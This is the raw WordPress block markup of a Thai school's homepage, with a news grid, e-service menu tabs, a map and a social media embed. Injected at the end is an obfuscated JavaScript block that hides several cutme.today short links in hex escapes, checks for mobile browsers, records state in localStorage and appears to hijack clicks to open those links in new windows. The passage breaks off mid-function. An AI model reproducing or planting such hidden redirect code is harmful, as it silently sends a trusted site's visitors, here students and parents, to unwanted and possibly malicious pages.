{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 